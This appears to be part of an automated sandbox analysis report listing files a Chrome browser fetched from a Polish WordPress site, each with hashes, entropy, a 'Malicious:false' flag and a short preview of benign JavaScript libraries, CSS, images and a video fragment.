                                                            SHA-512:49A09975B9100B3CDAD4A644A08B7AB4D32B0993F683C718FD14E5991BBA2C5B6287CAC4F7B5093302027623F31B7C9AA5258E373FEC59B8DED18796B283E849
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-includes/js/dist/hooks.min.js?ver=a7edae857aab69d69fa10d5aef23a5de
                                                            Preview:/*! This file is auto-generated */.this.wp=this.wp||{},this.wp.hooks=function(n){var t={};function r(e){if(t[e])return t[e].exports;var o=t[e]={i:e,l:!1,exports:{}};return n[e].call(o.exports,o,o.exports,r),o.l=!0,o.exports}return r.m=n,r.c=t,r.d=function(n,t,e){r.o(n,t)||Object.defineProperty(n,t,{enumerable:!0,get:e})},r.r=function(n){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(n,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(n,"__esModule",{value:!0})},r.t=function(n,t){if(1&t&&(n=r(n)),8&t)return n;if(4&t&&"object"==typeof n&&n&&n.__esModule)return n;var e=Object.create(null);if(r.r(e),Object.defineProperty(e,"default",{enumerable:!0,value:n}),2&t&&"string"!=typeof n)for(var o in n)r.d(e,o,function(t){return n[t]}.bind(null,o));return e},r.n=function(n){var t=n&&n.__esModule?function(){return n.default}:function(){return n};return r.d(t,"a",t),t},r.o=function(n,t){return Object.prototype.hasOwnProperty.call(n,t)},r.p="",r(r.s="gEOj")}({gEOj:fun
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (5477)
                                                            Category:dropped
                                                            Size (bytes):5629
                                                            Entropy (8bit):5.064978927674849
                                                            Encrypted:false
                                                            SSDEEP:96:PwRxr6JAXgWWwrrSTrmM4KvlGC89QPjRxq2uVBXeHRGKrc4oPUGPgNhd+qLoBV7J:Pwjrycrr3rKvE9IjRxjGjgNhdTLo3re+
                                                            MD5:3A56752B736635BF69CB069B8818CBFD
                                                            SHA1:42E0951FE74BB3F56A30F51291823BCD4A84D76E
                                                            SHA-256:FF4BD34AA98A0214833619D3D751838DB015722DFBBEC15CD14DADC66CD67869
                                                            SHA-512:A255D61DE4E6CEC2084AAE0F027CCC0259039AEF62268A27072C8097D348D76BB725CA35563386CEB068387C9AD3AB0E331BD270BA754A38A2A2D33944F305F5
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:/*! This file is auto-generated */./*!. * imagesLoaded PACKAGED v4.1.4. * JavaScript is all like "You images are done yet or what?". * MIT License. */..!function(e,t){"function"==typeof define&&define.amd?define("ev-emitter/ev-emitter",t):"object"==typeof module&&module.exports?module.exports=t():e.EvEmitter=t()}("undefined"!=typeof window?window:this,function(){function e(){}var t=e.prototype;return t.on=function(e,t){if(e&&t){var i=this._events=this._events||{},n=i[e]=i[e]||[];return n.indexOf(t)==-1&&n.push(t),this}},t.once=function(e,t){if(e&&t){this.on(e,t);var i=this._onceEvents=this._onceEvents||{},n=i[e]=i[e]||{};return n[t]=!0,this}},t.off=function(e,t){var i=this._events&&this._events[e];if(i&&i.length){var n=i.indexOf(t);return n!=-1&&i.splice(n,1),this}},t.emitEvent=function(e,t){var i=this._events&&this._events[e];if(i&&i.length){i=i.slice(0),t=t||[];for(var n=this._onceEvents&&this._onceEvents[e],o=0;o<i.length;o++){var r=i[o],s=n&&n[r];s&&(this.off(e,r),delete n[r]),r.ap
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82", baseline, precision 8, 500x500, components 3
                                                            Category:dropped
                                                            Size (bytes):40944
                                                            Entropy (8bit):7.970831095887396
                                                            Encrypted:false
                                                            SSDEEP:768:vX81XIg2QlMuUxuB2eLyOfwKei36GAi+Qk60HLhqBDUFFSQv/EfpAr7m:vX81YWTUxOhfwKNMV7H1eYFs8Mynm
                                                            MD5:8BCCDB88D844CC188B32037E26A40677
                                                            SHA1:1D2D11222EA1FFCD7BFAB7C5989BF5545343D323
                                                            SHA-256:C5898680ADB559EEEF037D969CE90D58BBC02FB43119602E73172563106DE485
                                                            SHA-512:48CE9E13F8F9A210DBD12EBC5810941D12B8B7505F3B67625D085CC7496E01C42535CE2F5B3738A1F9E89AC355F3904B61B38B7ED8FF16BAFF8BA80A782AF03D
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..d...>.jh..z...G.Fy.I.*.W....f......N.p[.R....OoZ..c.@...7=.~..q....x.\.>A.......O.A.......+..}s.@$.}.)..p7.Zk0#..t...Q..?.....f.......c.?.;...rJ..Hi..j..Q.....X..u ..d..P*...,...E.R9.t.s.@..*.i.(...]I....C.Q..s..=.G.E*.(.&7)...],.`......?*..R..P....i@l.qZ2i.A9.....'.K.E..c'.JM..;..J..JB.9.!..
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90", baseline, precision 8, 500x500, components 3
                                                            Category:downloaded
                                                            Size (bytes):81975
                                                            Entropy (8bit):7.968453704704993
                                                            Encrypted:false
                                                            SSDEEP:1536:bFMrR6B/7y4WN0c4K4oPXNiTKK+hbKELIlZSHNZr6HX+v0a09rw:Jw65WSa4ovNiTTTECkHn+3+v0H9rw
                                                            MD5:DCD6F957D2D5FD5C16884B4F0B9C5C58
                                                            SHA1:8674723A7163FA9938B5C4543209D0C80C201F89
                                                            SHA-256:AC6EC07AFA1AE119279F3542F0098D821DF13E4932E1F4BBB8E3C1F30EBE2D60
                                                            SHA-512:EC6DF7E9DE6DFC5641E0F82B0DA309B1EA8F40AABEB892D4A4BF3F94F5C6B771DF0A66EBAB0F96AFBE8C2737844CC8D3D73C77F55B0C8233D0BEC98D2CE0023D
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2015/12/circles-1008411_1920-500x500.jpg
                                                            Preview:......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......1e#.z..(<I..jp....K.$..$}U.l..C.<;........k!.H...=A.>.....d..x.#.+ilt......Q.....\s.N...k....[..Z1._..../.N-m#[.m'T...B....r..W.....OY~...a..)%..q........a..h,......m...>..zv..K..P..8K..$..c^...)?g#.]Z.^..>.....u]m.F..Gb7K+e...g.....i...O.uW.=?Pe..#..|...q.....j,.oR;..[.0..>`..........N.$\b....
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82", baseline, precision 8, 500x500, components 3
                                                            Category:downloaded
                                                            Size (bytes):40944
                                                            Entropy (8bit):7.970831095887396
                                                            Encrypted:false
                                                            SSDEEP:768:vX81XIg2QlMuUxuB2eLyOfwKei36GAi+Qk60HLhqBDUFFSQv/EfpAr7m:vX81YWTUxOhfwKNMV7H1eYFs8Mynm
                                                            MD5:8BCCDB88D844CC188B32037E26A40677
                                                            SHA1:1D2D11222EA1FFCD7BFAB7C5989BF5545343D323
                                                            SHA-256:C5898680ADB559EEEF037D969CE90D58BBC02FB43119602E73172563106DE485
                                                            SHA-512:48CE9E13F8F9A210DBD12EBC5810941D12B8B7505F3B67625D085CC7496E01C42535CE2F5B3738A1F9E89AC355F3904B61B38B7ED8FF16BAFF8BA80A782AF03D
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2018/01/www-kwadrat-notesy-500x500.jpg
                                                            Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..d...>.jh..z...G.Fy.I.*.W....f......N.p[.R....OoZ..c.@...7=.~..q....x.\.>A.......O.A.......+..}s.@$.}.)..p7.Zk0#..t...Q..?.....f.......c.?.;...rJ..Hi..j..Q.....X..u ..d..P*...,...E.R9.t.s.@..*.i.(...]I....C.Q..s..=.G.E*.(.&7)...],.`......?*..R..P....i@l.qZ2i.A9.....'.K.E..c'.JM..;..J..JB.9.!..
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (1943)
                                                            Category:dropped
                                                            Size (bytes):48262
                                                            Entropy (8bit):5.26640401609811
                                                            Encrypted:false
                                                            SSDEEP:768:D1x9gyeNJxz7twiurw5MfawiCoxSS8XUjjLYNUYtput/aRIM0R3:D1x9gyeNJxz7twiTYaL8S8k3LYNUYt8T
                                                            MD5:40656483C2192FC831EB4143A2952179
                                                            SHA1:CE1169A1758558B27480BED1205114F65A4DAB33
                                                            SHA-256:5D8BD6453CD02F4BE0C763AF402F43CE7ADB5630EC109BC2B01F9E5E314525C5
                                                            SHA-512:EA23FCDD0A668B67FA6827E089F01FC7B2916A3F9003877BC1488A37395B54F3D68B47E00079A5695FE4930417EB7AFF61D3A420A08F235B967D38A9372AB7FA
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:/*! Magnific Popup - v1.0.0 - 2015-09-17.* http://dimsemenov.com/plugins/magnific-popup/.* Copyright (c) 2015 Dmitry Semenov; */.;(function (factory) { .if (typeof define === 'function' && define.amd) { . // AMD. Register as an anonymous module. . define(['jquery'], factory); . } else if (typeof exports === 'object') { . // Node/CommonJS . factory(require('jquery')); . } else { . // Browser globals . factory(window.jQuery || window.Zepto); . } . }(function($) { ../*>>core*/./**. * . * Magnific Popup Core JS file. * . */.../**. * Private static constants. */.var CLOSE_EVENT = 'Close',..BEFORE_CLOSE_EVENT = 'BeforeClose',..AFTER_CLOSE_EVENT = 'AfterClose',..BEFORE_APPEND_EVENT = 'BeforeAppend',..MARKUP_PARSE_EVENT = 'MarkupParse',..OPEN_EVENT = 'Open',..CHANGE_EVENT = 'Change',..NS = 'mfp',..EVENT_NS = '.' + NS,..READY_CLASS = 'mfp-ready',..REMOVING_CLASS = 'mfp-removing',..PREVENT_CLOSE_CLASS = 'mfp-prevent-close';.../**. * Private vars . */./*jshint -W079 */.var mfp, // As we have only
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:OpenPGP Public Key
                                                            Category:downloaded
                                                            Size (bytes):1048576
                                                            Entropy (8bit):7.999781222632924
                                                            Encrypted:true
                                                            SSDEEP:24576:/cieRf9ZcdLRCGo6xxlbUunNIZC1S/DnxsuO3xc+iH:/cieRfLcdLoR4xxNIxat3uH
                                                            MD5:AAE838DE8ED16F62CA547ECD204ECE90
                                                            SHA1:74D046F6763A8A2B2A88718DF059328FB15E655B
                                                            SHA-256:C587333DAD519C5924D8754ACB58584AB404CDEE68CEADA0D41F5EB1C2C168A7
                                                            SHA-512:34CADAB5CC76C39E6672B1197E0501C78A3DF4637841B5F3D1F70EE44D7E301E75192DCB757B1B75E26395C6F9F830BD41B0696D806083745898B0D5363E4F15
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2016/02/city_1.mp4:2f8a52234edc61:3
                                                            Preview:.(.H....XjM.6....q..=..<~?..G7I..'.........k.M...J.r\k..R..@+.b.@U..u..N...Dq..S.+.o.X..."......3.s...#.D.J.W...u.+u......C..O....C.w.Q...x...D......n.F<......5.!..;..,......g.}.1s....a.4.J...*...[.U....".w<;K.i9..o.../n...b"..w...f....8Nlg.....S.......61oy.$.p...7...5...?..p.D.)6....M..hlF.....cX.d.v......./....u...`.../....C..WJ.)...X44..~..C~.#KN.P0..d..^:.K-W-.....e..m]x...@[...G...I.....d....U{......JT..L.pg.o..Dj..U.3.6..}....)...}J;..U5.]j...9.Y.E....H....b...B........FFS.......E......[...K"O..L.s0;.....Q._.#R..N>``.}..7...c.7.3.I.....Gv..o.....[=Q.f.YZSk<..<.W...HHg3...6`..E.YF.>..<.....,...$=.9...I.......#.....G....X.\.T&.hm...w.].NM4.s.....Z.@4.....i..]g...'vVU....6..E.hO.UL..W`..k..k..}Lc...AB.SsWv..H.....U.".F.n...p.k.]B9.k~./...gB.....lJ5.<.u.F2....]|.&r\....^.....!U.F b...^W2L...D..5..s5...M..aH..D..H.......^V.g.....i..5..J?.^l..u...h..m@....M.$61.X.J!..f.M.t..B......E..GP.*.....V...\..Q.j...E.n.WL-.V'.YE.ULHa3..N).7......*.D7
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (11767)
                                                            Category:dropped
                                                            Size (bytes):11918
                                                            Entropy (8bit):5.342123394508433
                                                            Encrypted:false
                                                            SSDEEP:192:WVcNcauOYomE8wQxrR6zHB+wvov18SA4FHgRlhfemOYFfycBmSCc:WcNcBOYomXwQxrR6DBpv+8yFHgTBemO8
                                                            MD5:AD1BE4B3A88F7F8A7A0E5AB4A99BD702
                                                            SHA1:1B686B4A76953E7E077A36AB23624075F3E928D2
                                                            SHA-256:73458F1064286FB94C7814ABC031471DFC7F1C7C9C5B7FB421A20A98F564D11B
                                                            SHA-512:C00C8E157793CDBAD810FED186293EB774D3B050102B832A3BA04AB6AE042FD5047A24A86B384CD0F2E5E64462E1935BCDAA1D51AD496FD86D5AC721BE6603E2
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:/**. * vivus - JavaScript library to make drawing animation on SVG. * @version v0.2.1. * @link https://github.com/maxwellito/vivus. * @license MIT. */."use strict";!function(t,e){function r(r){if("undefined"==typeof r)throw new Error('Pathformer [constructor]: "element" parameter is required');if(r.constructor===String&&(r=e.getElementById(r),!r))throw new Error('Pathformer [constructor]: "element" parameter is not related to an existing ID');if(!(r.constructor instanceof t.SVGElement||/^svg$/i.test(r.nodeName)))throw new Error('Pathformer [constructor]: "element" parameter must be a string or a SVGelement');this.el=r,this.scan(r)}function n(t,e,r){this.isReady=!1,this.setElement(t,e),this.setOptions(e),this.setCallback(r),this.isReady&&this.init()}r.prototype.TYPES=["line","elipse","circle","polygon","polyline","rect"],r.prototype.ATTR_WATCH=["cx","cy","points","r","rx","ry","x","x1","x2","y","y1","y2"],r.prototype.scan=function(t){for(var e,r,n,i,a=t.querySelectorAll(this.TYPES.join(
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:Unicode text, UTF-8 text, with very long lines (16323)
                                                            Category:dropped
                                                            Size (bytes):16470
                                                            Entropy (8bit):5.1560221328307945
                                                            Encrypted:false
                                                            SSDEEP:192:WtPfqyePEjWePwydyCt3kP1oAGVTbd9KDD79q/yu3kqITOmrvcJT0RL+rV58jYI3:h1PEjZPwEt35AqTbd9c4yu3b3ZrVDNzS
                                                            MD5:38400D9C6BA7D41239FCCFAA9F523558
                                                            SHA1:FE9A1548961441CE82E5399444F2BE5408D2644C
                                                            SHA-256:293913879D30BAB7499013E935009F5183FACBDDD63BFC9656A859622590B80B
                                                            SHA-512:3FA900CDE1E7DF34A418A622D08CD5D9673815C443D575D67F9E1798969AF770A3ED5BB62AEC4267DA0AA293E3FCE0968D15D7BFF17139411CA270B991EC143B
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:/**. * core-js 3.11.0. * https://github.com/zloirock/core-js. * License: http://rock.mit-license.org. * . 2021 Denis Pushkarev (zloirock.ru). */.!function(S){"use strict";var r,e,o;e={},(o=function(t){if(e[t])return e[t].exports;var n=e[t]={i:t,l:!1,exports:{}};return r[t].call(n.exports,n,n.exports,o),n.l=!0,n.exports}).m=r=[function(t,n,r){r(1),r(69),r(71),t.exports=r(75)},function(t,n,r){var e=r(2),o=r(46),i=r(48),c=r(50),u=r(19),f=r(8),a=r(54),s=function(t,n){var r=this;if(!(r instanceof s))return new s(t,n);i&&(r=i(new Error(S),o(r))),n!==S&&u(r,"message",String(n));n=[];return a(t,n.push,{that:n}),u(r,"errors",n),r};s.prototype=c(Error.prototype,{constructor:f(5,s),message:f(5,""),name:f(5,"AggregateError")}),e({global:!0},{AggregateError:s})},function(t,n,r){var a=r(3),s=r(4).f,p=r(19),l=r(22),g=r(23),v=r(33),y=r(45);t.exports=function(t,n){var r,e,o,i=t.target,c=t.global,u=t.stat,f=c?a:u?a[i]||g(i,{}):(a[i]||{}).prototype;if(f)for(r in n){if(e=n[r],o=t.noTargetGet?(o=s(f,r))&&
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1920x1280, components 3
                                                            Category:dropped
                                                            Size (bytes):324523
                                                            Entropy (8bit):7.9487054098291825
                                                            Encrypted:false
                                                            SSDEEP:6144:OW2c/YXsfNzV46YJ5zCz+aC9gYJXMA0Eb9l0lhBeGE:OW2tXs1x4V5zIS9BJXMKP0l3eGE
                                                            MD5:292309ED225056871E7DC4E79158FCE0
                                                            SHA1:8D93E98612F151EF6340F9D59A62D46335604229
                                                            SHA-256:DEF58744C7E09378E113C920715AC2A7B393BF164EE9720A15AB2F7AF6AAEAE1
                                                            SHA-512:B39BB83B0B109DA9B3C5B77679652F9B226C4201B739294399F6DFFE0839ED6F955D6D18892D4CE3B1AAB8DA15BE24C7AD5ABEDAFF70C96CCD364829A21174C7
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:......JFIF.............C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..]d.J....%lw.U......../.J.d...5|..H.<...L....52K...*..R..-....@x.j.d.E...W...T......)..+.....>i4.h...xrx9.U.9".V.V!...zf..8.5X9..jE5<..X.sN.H.*.l..<7..5aX....g.j.......bp.w..7......4.&N....z..|R.r?...?.;}B....N...`.0zp.C..d...y..Y.....9..A..p98..*..C{.Y.O...a.....j I.4.i..C.J..........L..h.Q.I..J..w4n4..j\..<.3.h=.z.&..)C{.7Q.,.$..Z...f.,M...85F.<R.R.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (65266)
                                                            Category:dropped
                                                            Size (bytes):157610
                                                            Entropy (8bit):5.284064711550095
                                                            Encrypted:false
                                                            SSDEEP:3072:cWEI8UMz/tGzT3+XtHi2iX6APMupdRL21YOWy0AcDHzEJLDnWTnWNBEBysX6hMT0:deSRLQQqf
                                                            MD5:6DE31D697A1B1B2B0E2A3B29B1FB458B
                                                            SHA1:C9B6C996A66918F7C4D49C9B60134CE282C47143
                                                            SHA-256:443BA0AF7A7ED827223C7FB3C008C02B9FF1D651B6492E9C270378B07D9F6008
                                                            SHA-512:320C73680EC192AEE0D8D0FFE17620A3151B7A1B87AF743F6D3B869F8949902C5FC471245F3475065D2FC82A0784A94C944D99685CA6B09AD114B880C503A93E
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:/*!. * MediaElement.js. * http://www.mediaelementjs.com/. *. * Wrapper that mimics native HTML5 MediaElement (audio and video). * using a variety of technologies (pure JavaScript, Flash, iframe). *. * Copyright 2010-2017, John Dyer (http://j.hn/). * License: MIT. *. */.!function r(a,s,l){function d(n,e){if(!s[n]){if(!a[n]){var t="function"==typeof require&&require;if(!e&&t)return t(n,!0);if(u)return u(n,!0);var o=new Error("Cannot find module '"+n+"'");throw o.code="MODULE_NOT_FOUND",o}var i=s[n]={exports:{}};a[n][0].call(i.exports,function(e){var t=a[n][1][e];return d(t||e)},i,i.exports,r,a,s,l)}return s[n].exports}for(var u="function"==typeof require&&require,e=0;e<l.length;e++)d(l[e]);return d}({1:[function(e,t,n){},{}],2:[function(i,r,e){(function(e){var t,n=void 0!==e?e:"undefined"!=typeof window?window:{},o=i(1);"undefined"!=typeof document?t=document:(t=n["__GLOBAL_DOCUMENT_CACHE@4"])||(t=n["__GLOBAL_DOCUMENT_CACHE@4"]=o),r.exports=t}).call(this,"undefined"!=typeof global?global
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 210x210, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=12, description=OLYMPUS DIGITAL CAMERA , manufacturer=OLYMPUS IMAGING CORP. , model=E-3 , orientation=upper-left, xresolution=231, yresolution=239, resolutionunit=2, software=Adobe Photoshop 7.0 CE, datetime=2018:07:26 13:56:12], baseline, precision 8, 437x422, components 3
                                                            Category:downloaded
                                                            Size (bytes):77710
                                                            Entropy (8bit):7.727875314287752
                                                            Encrypted:false
                                                            SSDEEP:1536:DyLg4xyLg4xtiysYg886crRhVmCdkTbwBrwHT5jrv73t7kE5:D6N6GyR86cTmC5BrwljdZ5
                                                            MD5:7C221DDBAA0EF53870040E14EBAD2A40
                                                            SHA1:C89B4F06A378005F805016FDC32B8B0D674E9DA7
                                                            SHA-256:FCFA555D3D3E6D3C778057644E4937F7DBAD4E4AB7521055912E8DDB47819E3A
                                                            SHA-512:1F4DC130807D90B92B13B23CEEBC1EAC0394C3B901A806061E32EC49E50B361A4AAB1485B1F270ACFFCC79D3AD8DFEF3319A8697612A54F15719AEA6C13F2547
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2018/10/disneyszyte.jpg
                                                            Preview:......JFIF............"/Exif..II*........... ...................................................................(...........1...........2..............................."...i.......4...l...OLYMPUS DIGITAL CAMERA .OLYMPUS IMAGING CORP. .E-3 .................Adobe Photoshop 7.0 CE.2018:07:26 13:56:12.PrintIM.0300..%.............................................8.................P.....`... ..................................................................................................... ......................................................'.......'.......'.......'.......'..^....'.......'.......'.......'....................................................................................................................................@@........@@........@@............@@........@@........@@.........................................................."...........'.......}...........0221........................................................................................
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (451)
                                                            Category:downloaded
                                                            Size (bytes):27512
                                                            Entropy (8bit):5.071415057780099
                                                            Encrypted:false
                                                            SSDEEP:384:jgJC/LfS2Ayy6EhBEFWh2GoafaEfxqxpwLpyRhpUmUw:SChwh2GoafaEfxqxpwLpyRhB
                                                            MD5:0511E8C1C5666A6AF0BEAF21EB46D57C
                                                            SHA1:BB27E1D554FC31B74E4AC5847B533407BC9B71CC
                                                            SHA-256:1AFCA283AD0B5276D3D9D4B862B7C53438DC294E630D8A117C3CBC59A2325DEE
                                                            SHA-512:8704567B1B9E277E8090768CA607B0C6FD2FEE9A9750DD8B05260EC070181C72826745647F760B172538319513CAB515F83CF2C14486521EA5840337741AE93F
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/themes/salient/css/ascend.css?ver=7.6
                                                            Preview:.ascend .container-wrap, .ascend .project-title, body .vc_text_separator div, .carousel-wrap[data-full-width="true"] .carousel-heading, .carousel-wrap span.left-border, .carousel-wrap span.right-border,.#page-header-wrap, .page-header-no-bg, #full_width_portfolio .project-title.parallax-effect, .portfolio-items .col, .page-template-template-portfolio-php .portfolio-items .col.span_3, .page-template-template-portfolio-php .portfolio-items .col.span_4 {..background-color: #f6f6f6;.}..#call-to-action .triangle {..color: #f6f6f6;.}...ascend #footer-outer #footer-widgets .col ul li, .ascend #sidebar div ul li,..ascend #sidebar .widget.widget_categories li, .ascend #sidebar .widget.widget_pages li, .ascend #sidebar .widget.widget_nav_menu li {..border: none!important;..padding: 4px 0;.}...ascend #sidebar .widget.widget_categories li, .ascend #sidebar .widget.widget_pages li, .ascend #sidebar .widget.widget_nav_menu li,..ascend #footer-outer .widget.widget_categories li, .ascend #footer-outer
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (28406)
                                                            Category:downloaded
                                                            Size (bytes):50529
                                                            Entropy (8bit):4.87439375719142
                                                            Encrypted:false
                                                            SSDEEP:768:xPN7a+79Vdo9I6lr+Klk3Yi+fwYUf8l8yQ/eY:H7a2o26lrniSUf8l7fY
                                                            MD5:CDF5855FD342923795BFDCCFC4C45307
                                                            SHA1:B6ECA37D62725A679709D5AB3FBC572C9BC489E0
                                                            SHA-256:4282475E8731B777FF63C9B361EB1F0574B392C0E7055F02D568A1B2CC1744F6
                                                            SHA-512:7C6673DC61ADF8EE0C6D0987E683F28286818EB6FBE63AE16413D52D5920C2C16604E6C5F4C7E776D73279B0F27D0D19ED6A111F0EF95E44D8FA14814FC17A72
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/themes/salient/css/font-awesome.min.css?ver=4.6.3
                                                            Preview:.@font-face{..font-family:'FontAwesome';..src:url('fonts/fontawesome-webfont.eot?v=4.2');..src:url('fonts/fontawesome-webfont.eot?#iefix&v=4.2') format('embedded-opentype'),...url('fonts/fontawesome-webfont.svg#fontawesomeregular?v=4.2') format('svg'),.. url('fonts/fontawesome-webfont.woff?v=4.2') format('woff'),.. url('fonts/fontawesome-webfont.ttf?v=4.2') format('truetype');..font-weight:normal;..font-style:normal;.}.[class^="icon-"],[class*=" icon-"], [class*="fa-"]{font-family:FontAwesome;font-weight:normal;font-style:normal;text-decoration:inherit;-webkit-font-smoothing:antialiased;*margin-right:.3em;}.[class^="icon-"]:before,[class*=" icon-"]:before{text-decoration:inherit;speak:none;}..icon-large:before{vertical-align:-10%;font-size:1.3333333333333333em;}./*a [class^="icon-"],a [class*=" icon-"]{display:inline;}*/.[class^="icon-"].icon-fixed-width,[class*=" icon-"].icon-fixed-width{display:inline-block;width:1.1428571428571428em;text-align:right;padding-right:0.28571428571
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text
                                                            Category:downloaded
                                                            Size (bytes):44718
                                                            Entropy (8bit):5.065432771696816
                                                            Encrypted:false
                                                            SSDEEP:768:aZPsGSz6kmfF2RvmcJPaxxxt2MPxfpvzOU:axsGSzmfF2NmcJPaxxxt2MPyU
                                                            MD5:2A15EC5B5BB4C9DE0D7D432F2108E5A5
                                                            SHA1:0EB39CE09449C5A69140ADFB3B7F8FF0D8E732A3
                                                            SHA-256:321C5BE3B89FA8C34805A0DF376785992E30B76C33745C901621C133ED879003
                                                            SHA-512:6734B61D268579E109A8BDFF1ECD7E165A8FBD90E8798DDF4F20E8DF330A5DF4D0CD370E5979B62B0F1E3EC3016613A621187DA1FDA7B156BAB7BF1FF4421E87
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/themes/salient/css/portfolio.css?ver=7.6
                                                            Preview:..portfolio-items .col .work-item.style-3 .work-info-bg {..background-color: #282b30;..opacity: 0.45;..will-change: opacity;.}....portfolio-items .col .work-item.style-3 h3,..portfolio-items .col .work-item.style-3-alt h3 {..margin-bottom: 5px;.}...portfolio-items .col .work-item.style-3 a,..portfolio-items .col .work-item.style-3-alt a {..background: transparent url('../img/transparent.png') repeat 0 0;..}...portfolio-items .col .work-item.style-3 h3, .portfolio-items .work-item.style-3 .work-info,..portfolio-items .col .work-item.style-3-alt h3, .portfolio-items .work-item.style-3-alt .work-info {..opacity: 1!important;..-ms-filter: "alpha(opacity=100)"!important;.}...portfolio-items .col .work-item.style-3 .vert-center *, .portfolio-items .col .work-item.style-3 i,..portfolio-items .col .work-item.style-3-alt .vert-center *, .portfolio-items .col .work-item.style-3-alt i {..-ms-filter: "alpha(opacity=100)"!important;.}....portfolio-items .auto-height {..height: auto!important;.}...p
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (445)
                                                            Category:downloaded
                                                            Size (bytes):144014
                                                            Entropy (8bit):5.051902374171121
                                                            Encrypted:false
                                                            SSDEEP:768:HSQJKWkfGayJqSEcMMu4eJN+dMsyiOSzZ9SM4uby/2VS9Dn:Hzk+a6qXMu4eJwdMtf+SM4uby/gS5n
                                                            MD5:D7C00266E6374F2DE61FAE7D0013F950
                                                            SHA1:BBD883248430DA6BF52829CFCA1198632D1C625F
                                                            SHA-256:2D267CBF2A48D308D6CE50072B46B19DB66230EBE14B2B9CB1C7CB5DF2003FDB
                                                            SHA-512:33A491DD6F006FCE9B304953CFF2F67062C8972A4391F1233DFA68E3CD05FF0402134BC5306BBE7230A56B5906B6C5DE4AD59A90A8CD602F33123124B8401251
                                                            Malicious:false
                                                            Reputation:low
